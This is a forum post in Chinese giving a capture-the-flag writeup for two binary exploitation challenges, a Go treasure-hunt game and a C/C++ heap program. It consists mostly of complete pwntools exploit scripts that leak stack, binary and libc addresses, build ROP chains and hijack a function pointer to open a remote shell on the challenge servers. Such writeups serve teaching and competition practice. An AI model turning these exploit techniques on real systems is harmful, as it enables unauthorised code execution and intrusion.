-
-
[原创]第8 第9题Writeup (队友代发)
-
2019-3-25 23:38 5014
-
8. 挖宝
Pwn
Go 1.6 Binary
Treasure4会往真的栈上写
预测Treasure4的位置,然后ROP
from pwn import * from time import sleep from ctypes import CDLL import sys,os context.arch = "amd64" elf = ELF("./trepwn") libc = ELF("./trelibc.so") host = "211.159.175.39" port = 8787 name_ptr= 0x489410 ret1 = 0xC820047CE0 padding = 'A'*0x30 cc = False endtime = 1 stackaddr =0 baseaddr = 0 libcaddr = 0 cacheaddr = 0 #io = process("./trepwn",env = {'LD_PRELOAD':'./trelibc.so'}) io = remote(host,port) def mov(d): sleep(0.1) io.sendlineafter(")>>",d) def msg(data): io.sendlineafter(">> ",data) def pwn(): global endtime global stackaddr global baseaddr global libcaddr global cacheaddr if endtime ==1: io.sendline('a'*(6*8)+p64(1)*2+'a'*(8*16)+'\xf8')#+p64(0XC820064250)+p64(0x200)+p64(0x200)) io.recvuntil('message: ') addr = u64(io.recv(8)) print hex(addr) stackaddr = addr endtime += 1 return if endtime ==2: io.sendline('a'*(6*8)+p64(1)*2+'a'*(8*16)+p64(stackaddr+0x60)) io.recvuntil('message: ') addr = u64(io.recv(8)) print hex(addr) baseaddr = (addr-(0x55ff03397ee9-0x55ff032c0000 ))&0xfffffffffffff000 info("base:0x%x",baseaddr) endtime +=1 return if endtime ==3: io.sendline('a'*(6*8)+p64(1)*2+'a'*(8*16)+p64(baseaddr+0x474ef0)) io.recvuntil('message: ') addr = u64(io.recv(8)) print hex(addr) libcaddr =addr -( 0x7f75ffa89950-0x7f75ff9f2000 ) #io.interactive() info("libc:0x%x",libcaddr) endtime +=1 return if endtime ==4: io.sendline('a'*(6*8)+p64(1)*2+'a'*(8*16)+'\x18')#+p64(0XC820064250)+p64(0x200)+p64(0x200)) io.recvuntil('message: ') addr = u64(io.recv(8)) print hex(addr) cacheaddr = addr endtime += 1 #io.interactive() return #io.interactive() if endtime ==5: #raw_input() syscall = 0x186600 add_rsp = 0xd72f4 rop = p64(baseaddr+syscall) rop += p64(add_rsp) rop += p64(59) rop += p64(libcaddr+next(libc.search("/bin/sh"),)) rop += p64(0)*3 io.sendline('a'*(6*8)+p64(1)*2+'a'*(8*16)+p64(stackaddr-0xf8+0x38)+p64(0x30)*2+p64(0)*3+p64(1)+p64(0xcb4)+p64(cacheaddr)+p64(0x1)+p64(0x0)*2+rop) endtime+=1 io.interactive() io.interactive() #raw_input() name = 'AAAA' io.sendlineafter("Please input you name :\n",name) #rand = callrand() for i in range(5): mov('d') #rand = callrand() msg('1'*0x10) info("Treasure 1 found") for i in range(5): mov('w') #rand = callrand() msg('2'*0x10) info("Treasure 2 found") for i in range(5): mov('a') #rand = callrand() msg('3'*0x10) info("Treasure 3 found") mov('s');mov('d') des = 'dsaw' def mov_brute(d): io.sendlineafter(")>>",d) if "Cong" in io.recv(0x13): cc = True info("Treasure 4 found") pwn() def loop(): sleep(0.1) for de in des: for i in range(3): mov_brute(de) cnt = 0 while True: loop() cnt=cnt+1 if(cnt%20==0): cod = io.recv(4) info("loop %d cod %s"%(cnt,cod))
9. C与C++
Pwn
delete的时候会调一个函数指针,利用这个性质来实现任意地址执行
from pwn import * #p = process('./candcpp') p=remote('154.8.222.144', 9999) p.recvuntil('name') p.sendline(p64(0x400e10)+p64(0x4009a0)) def c_malloc(l,s): p.recvuntil('>>') p.sendline('1') p.recvuntil('string') p.sendline(str(l)) p.recvuntil('string') p.send(s) def c_free(idx): p.recvuntil('>>') p.sendline('2') p.recvuntil('string') p.sendline(str(idx)) def cpp_new(l,s): p.recvuntil('>>') p.sendline('3') p.recvuntil('string') p.sendline(str(l)) p.recvuntil('string') p.send(s) def cpp_dele(idx): p.recvuntil('>>') p.sendline('4') p.recvuntil('string') p.sendline(str(idx)) #c_malloc(0x2e,p64(0x401228)+p64(0)[:-1]+p64(0x401228)+p64(0)[:-1]+p64(0x401228)+'\n') #c_malloc(0x2e,p64(0x401228)+p64(0)[:-1]+p64(0x401228)+p64(0)[:-1]+p64(0x401228)+'\n') #c_malloc(0x2e,p64(0x401228)+p64(0)[:-1]+p64(0x401228)+p64(0)[:-1]+p64(0x401228)+'\n') c_malloc(0xe,(p64(0x401228)+p64(0x401228)[:-1])+'\n') c_malloc(0xe,(p64(0x401228)+p64(0x401228)[:-1])+'\n') c_malloc(0xe,(p64(0x401228)+p64(0x401228)[:-1])+'\n') #cpp_new(0x20,'AAAAA\n') #cpp_new(0x20,'BBBBB\n') c_malloc(0x100,(p64(0x401228)+p64(0x401228)[:-1])*18+'\n') #cpp_new(0x100,'BBBBB\n') c_malloc(0x100,(p64(0x602328+8)+p64(0x602328+8)[:-1])*9+(p64(0x602328)+p64(0x602328)[:-1])*6+'\n') c_free(2) c_free(1) c_free(0) #cpp_new(46,(p64(0x4008b0)+p64(0x4008b0)[:-1])*5+p64(0x4008b0)+'\n') #cpp_new(0x8,'aaa\n') #c_malloc(0x2e,(p64(0x401228)+p64(0)[:-1])*3+p64(3)+p64(0x4008b0)+'\n') #cpp_dele(0) c_malloc(0xe,(p64(0x401228)+p64(0x401228)[:-1])*15+'\n') c_free(0) c_malloc(0xe,(p64(0x401228)+p64(0x401228)[:-1])*15+'\n') cpp_dele(0) p.recvuntil('0x') addr = int(p.recvuntil('\n')[:-1],16) libc_base = addr - (0x7f1a7c683690-0x7f1a7c614000) one = libc_base +0xf02a4 info("libc:0x%x",libc_base) p.recvuntil('name') p.sendline(p64(one)) c_free(4) c_malloc(0x100,(p64(0x602328+8)+p64(0x602328+8)[:-1])*9+(p64(0x602328)+p64(0x602328)[:-1])*6+'\n') cpp_dele(0) p.interactive()
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
赞赏
他的文章
看原图